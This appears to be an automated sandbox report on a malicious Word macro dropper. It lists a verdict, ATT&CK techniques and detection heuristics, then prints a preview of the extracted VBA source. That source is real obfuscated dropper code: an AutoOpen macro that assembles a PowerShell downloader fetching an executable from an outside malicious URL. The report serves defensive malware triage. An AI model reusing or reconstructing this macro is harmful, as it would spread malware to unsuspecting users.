Verdict: MALICIOUS
Risk Score: 244
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is configured to execute a command using the Shell() function, indicating it's designed to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6374210-0' further supports this dropper functionality.
Heuristics (8)
- ClamAV: Doc.Dropper.Agent-6374210-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6374210-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 151373 bytes |

SHA-256: bd5883e0d957a8eb8535346569a8d95581db766a08978699507db5957ba55feb
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 40 long base64-like blob(s))
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Nzjshn"
Sub AutoOpen()
ifsEcUi = "REOFdwX" + "jjRDjfR" + "NjroZkY" + "uQmahwC"
Kidhwlflo
OqPTbLa = "YZrqDpu" + "ZZRzaCR" + "wAPDkGX" + "obfvzUV"
End Sub
Function MGfjaVHzV()
RZMsAGabtX = "" + MszcXDD + DuDuztq + woiGajw + cRnLQIj + Mid("tUtacL+acLemacL+acL(ra'+'FacL+acLhuas);bacL+acLreakacL+acL;acL+a5ej+5ejcL}cacL+acLatch{writacL+acLe-host acL+acLrwb8RJ0JqDGXuvLfc0fmJC", 4, 110) + zdAXtbc + iSmXuNT + doKBkQO + RjprYGj
RmECmK = "aKQGvWE" + "QCXFRNT" + "VwijSiw" + "ccKjsSh"
dmWSkEQuX = "zLfVVtD" + "IVQwrPM" + "lmvSCuw" + "jGLGbkz"
LIRIHwKioju = "hGZDDXT" + "rskvUPM" + "aShaPmr" + "qOOqXkN"
TBUsMoGh = "" + LXhijIo + ifMwGrr + LNjmFmY + VCMKmLb + Mid("oB7GDiblacL+ac'+'Lic + 3FfSor35ej+'+'5e'+'jacL+acLJzroikV76w4m3Ajc", 7, 44) + lnXtwvD + qIsBFQp + jhJwjXi + iHFnHWp
HCIMj = "VUUzwMs" + "soFJwnU" + "EnkAWjl" + "UCLCowD"
thHooi = "jSFpZNV" + "nYEIEwr" + "sEonjJi" + "TUnknEA"
iKJuOWtJZf = "SJuIPpM" + "WzUXawQ" + "PjrRmtb" + "zWPEnYM"
BHPwEoSu = "" + UQJKNDn + vSAKYUm + iDcQzYh + OlQduAX + Mid("SAN04bjzuCj2SOcLd = new-acL+acLoba'+'cL+acL5ej+5'+'ejja'+'cL+acLectacL+acL ranac'+'L+acLdom;racL+acLaFac'+'L+acLbcacL+acLd K3XE12LUHkz6tVwhkESkU", 15, 109) + sdfOFtC + zvcLIKW + mlwwBci + vMpjzXF
kYdQa = "ithSCQD" + "pUwTbki" + "IAFqOKc" + "zRjtYsw"
jzrrJQ = "QqhHVwU" + "BusGtTw" + "QCdaszn" + "LkpjNdf"
jiFZUCzaXGG = "bAYiYGY" + "iOMFnKG" + "FMkVqfj" + "PDTfsJE"
fTQwfNSXLEG = "" + QUEpjGX + FOWzvMw + FwfzTYX + ozUUjLs + Mid("VJn0lacL+acLsacL+acLdacL+acL.next(1ac'+'L+acL, 345ej3ikz9zY", 6, 47) + JAdHzbn + zbCdwim + JmVtNwO + cpPEMQc
dWvnQT = "XjVzuiw" + "OspwlJF" + "XdUUqki" + "LwaTPij"
nrFhnLfslft = "KNDkLKc" + "rhdEDpv" + "tjvcnIE" + "MvjWfzM"
bjapbFD = "lujfAPD" + "ilNZwdj" + "vqQnviR" + "SiqcVbw"
ocRwDsw = "" + hCofYQE + TikOuTP + pDfnEMR + ztlNZIt + Mid("8YF4UIuA8w4mqnk9Nj+5e'+'jngacL+acLg'+'.in/acL+ac5ej+5ejLdkacL+acLmHoacL+acLg/3acL+a5ej+5ejcLFf.acL+acLSplacL+acLit(3FacL+ac5ej+5ejLf,3Ff);raFk'+'arapaacL+acLs = racL+acLaacL+acLFn5'+'ej+5ejsadaYH8DKjH9ziLvNO4ak3j5", 18, 176) + qkUqDXz + nnqDhOA + fvwVnWH + WXmnBdi
udwOcEGhOK = "ICRwHKc" + "zPYqvSB" + "PpkXwQT" + "zmrmmmT"
BcowAllTA = "NiDBuPi" + "lYEaDYi" + "jairEFH" + "hCQDMOL"
JjriQfE = "PZMVXJj" + "jUpBDWi" + "QfzuslQ" + "MNvhhMf"
twnHd = "" + pqBidQW + SJUcuDM + RnqzEAh + rTCDIRn + Mid("HAUKOBuR1bbXjMEPX3sjLxacL6YdnbcuO4Hwc0Vkcvr", 20, 6) + sOdnQGX + EjwiPJU + oNYZRmb + QpRuwYw
adQAzEkSG = "WwfUzia" + "vqodzoM" + "GrOprNC" + "GddrfMb"
QuikjctrY = "YMtSiZi" + "iTNPatt" + "XjvTwPK" + "wDFHKvQ"
OhFYmMi = "VBdTWwW" + "ivLPOdY" + "YAZRTJi" + "uhXhzRa"
QoLpJY = "" + kEjllaC + fqqlhbT + FmZhvVG + ArkLLGP + Mid("bJKodBLSYbWUOFiRt+acLbLFacL+acLmacL'+'+acLk/,httacL+acLp://hacL+acLousefoacL+acLrsalelaguacL+acLna.ac5ej+5ejL+acLiacL+'+'acLnfoacL+'+'acL/QuvJacL+acL/,hacL5ej+5ej+ac7i0m4", 18, 148) + cNYmpFz + TwLjAFI + Uhsklwf + JiOaXij
Bddiv = "NwZZUnC" + "cRwsVWm" + "oNAvPzj" + "KrbaHkT"
cEBiCAbrXt = "jKLSWNF" + "zmGjSFr" + "PtrPcsV" + "QNfHkDD"
bikjcdXU = "GzzMCjt" + "HnZwIjo" + "auPwrou" + "zjKfrwS"
GhotPbEFsMT = "" + SRTMjpS + PLtOIJN + pjLkbKG + PMwdvln + Mid("fsKB8kjKBJRPzjrM33iVW+ac5e'+'j+5ejLception.Mes'+'sagacL+acLeacL+acL;acL+acL}acL+acL}acL) -rEpLaCE '+'acLraFacL,[cHaR]36 -rEpLaCErkrSAuu23jtvic", 22, 107) + vjVrnqR + tLfSciQ + zsvujbR + mFlWzAC
lbuIndRzNR = "EUikDiU" + "iYXVSvw" + "VfSwfqQ" + "UDjLKWI"
fPlHmLkfnG = "bjVpqPo" + "rwhYzwU" + "UYZRfVR" + "ZSXRJmk"
GuzfKZBIKz = "RzYtILD" + "oBfbjHd" + "jlajuvz" + "fJuiBqC"
BjFjPCTQHv = "" + tqzNnqh + wlPqkmp + iPHUBXD + HuDCEmc + Mid("0nNEkT8E6uuuwsAH9JzbFrNs5WFf acL+acL+acL+acL acL+acLraac'+'L+acLFkaracL+acLapasacL+acL + a'+'cL+acL3Fac'+'L+acLf.eacL+acLxeacL+a'+'cL5ej+5ej3FacL+a5ej+5ejcLf;foacL+acLracL'+VsSjKH7Yztn", 27, 147) + voJiSIP + DinCMjB + nRmTnHi + PkPQJTm
mmSqwrdhDZA = "wvKjDEB" + "wGLRda
... (truncated)